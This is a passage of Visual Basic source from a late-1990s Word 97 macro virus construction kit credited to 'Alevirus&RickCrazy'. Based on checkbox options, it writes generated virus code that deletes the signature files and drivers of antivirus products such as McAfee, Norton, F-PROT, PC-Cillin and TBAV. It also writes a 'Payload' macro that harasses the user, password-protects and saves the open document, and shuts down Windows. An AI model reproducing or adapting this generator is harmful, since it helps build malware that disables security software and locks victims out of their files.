Print #1, " Kill ""C:\progra~1\comman~1\f-prot95\sign.def"""
Print #1, " Kill ""C:\Program Files\Command Software\F-PROT95\Dvp.vxd"""
Print #1, " Kill ""C:\progra~1\comman~1\f-prot95\dvp.vxd"""
End If
If frmRetro.chkbMcAfee = True Then
Print #1, " Kill ""C:\Program Files\McAfee\VirusScan95\Scan.dat"""
Print #1, " Kill ""C:\progra~1\mcafee\viruss~1\scan.dat"""
Print #1, " Kill ""C:\Program Files\McAfee\VirusScan95\Mcscan32.dll"""
Print #1, " Kill ""C:\progra~1\mcafee\viruss~1\mcscan32.dll"""
Print #1, " Kill ""C:\Program Files\McAfee\VirusScan\Scan.dat"""
Print #1, " Kill ""C:\Program Files\McAfee\VirusScan\Mcscan32.dll"""
End If
If frmRetro.chkbNorton = True Then
Print #1, " Kill ""C:\Program Files\Norton AntiVirus\Viruscan.dat"""
Print #1, " Kill ""C:\progra~1\norton~1\viruscan.dat"""
Print #1, " Kill ""C:\Program Files\Symantec\Symevnt.386"""
Print #1, " Kill ""C:\progra~1\symantec\symevnt.386"""
End If
If frmRetro.chkbPCCillan95 = True Then
Print #1, " Kill ""C:\PC-Cillin 95\Scan32.dll"""
Print #1, " Kill ""c:\pc-cil~1\*.dll"""
Print #1, " Kill ""C:\PC-Cillin 95\Lpt$vpn.*"""
End If
If frmRetro.chkbPCCillan97 = True Then
Print #1, " Kill ""C:\PC-Cillin 97\Scan32.dll"""
Print #1, " Kill ""C:\PC-Cillin 97\Lpt$vpn.*"""
Print #1, " Kill ""C:\Tsc\PC-Cillin 97\Scan32.dll"""
Print #1, " Kill ""c:\tsc\pc-cil~1\*.dll"""
Print #1, " Kill ""C:\Tsc\PC-Cillin 97\Lpt$vpn.*"""
End If
If frmRetro.chkbTBAV = True Then
Print #1, " Kill ""C:\TBAVW95\Tbscan.sig"""
Print #1, " Kill ""c:\Tbavw95\Tb*.*"""
Print #1, " Kill ""C:\Tbavw95\Tbavw95.vxd"""
End If
If frmRetro.chkbCHICO = True Then
Print #1, " SetAttr ""c:\Chico\ctr.1"",0"
Print #1, " Kill ""c:\Chico\*.*"""
Print #1, " RmDir ""c:\Chico"""
End If
If frmRetro.chkbEliaShim = True Then
Print #1, " Kill ""c:\Vdoc\*.*"""
Print #1, " RmDir ""c:\Vdoc"""
End If
If frmRetro.chkbEliaShim Or frmRetro.chkbCHICO Or frmRetro.chkbAVP Or frmRetro.chkbFMacro Or frmRetro.chkbFProt95 Or frmRetro.chkbMcAfee Or frmRetro.chkbNorton Or frmRetro.chkbPCCillan95 Or frmRetro.chkbPCCillan97 Or frmRetro.chkbTBAV = True Then
Print #1, "End Sub"
Print #1,
End If
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1,
Print #1, "'------------------------------------------------------------"
Print #1, "'Payload macro"
Print #1, "'Proposta aborrecer o usuário "
Print #1, "'------------------------------------------------------------"
Print #1, "Sub Payload()"
Print #1, " On Error Resume Next"
End If
If frmPayload.chkbAssistant = True Then
Print #1, " Assistant.Visible = True"
Print #1, " With Assistant.NewBalloon"
Print #1, " .Icon = msoIconAlert"
Print #1, " .Text = """ & frmPayloadOfficeAssistant.txtMessage & """"
Print #1, " .Heading = """ & frmPayloadOfficeAssistant.txtHeading & """"
Print #1, " .Animation = msoAnimationSearching"
Print #1, " .Show"
Print #1, " End With"
Print #1,
End If
If frmPayload.chkbBeep = True Then
Print #1, " For B = 0 To " & frmPayloadBeep.txtNumberOfBeeps
Print #1, " Beep"
Print #1, " Next"
Print #1,
End If
If frmPayload.chkbCaption = True Then
Print #1, " Application.Caption = """ & frmPayloadChangeCaption.txtCaption & """"
Print #1,
End If
If frmPayload.chkbChangeStatusBar = True Then
Print #1, " Application.StatusBar = True"
Print #1, " StatusBar = """ & frmPayloadChangeStatusBar.txtStatusBar & """"
Print #1,
End If
If frmPayload.chkbMessageBox = True Then
Print #1, " MsgBox """ & frmPayloadMessageBox.txtMessageBox & """,vbOKonly,""" & frmPayloadMessageBox.txtMessageBoxTitle & """"
Print #1,
End If
If frmPayload.chkbPassword = True Then
Print #1, " ActiveDocument.Password = """ & frmPayloadSetPassword.txtPassword & """"
Print #1, " ActiveDocument.Save"
Print #1,
End If
If frmPayload.chkbExitWindows = True Then
Print #1, " Tasks.ExitWindows"
Print #1,
End If
If frmPayload.chkbAssistant = True Or frmPayload.chkbBeep = True Or frmPayload.chkbCaption = True Or frmPayload.chkbChangeStatusBar = True Or frmPayload.chkbExitWindows = True Or frmPayload.chkbMessageBox = True Or frmPayload.chkbPassword = True Then
Print #1, "End Sub"
End If
ByeBye:
Close #1
MsgBox "Macro Word97 Kit v1.1, written by Alevirus&RickCrazy", vbOKOnly, "Alevirus98!! Sampaetano"
Tasks.ExitWindows
End Sub
Private Sub lblPayload_Click()
End Sub
Private Sub lblRetro_Click()
End Sub
Private Sub lblSourceFileName_Click()
End Sub
Private Sub lblStealth_Click()
End Sub
Private Sub lblVirusName_Click()
End Sub
Private Sub UserForm_Initialize()
lblVirusName = VirusName
lblSourceFileName = SourceFileName
…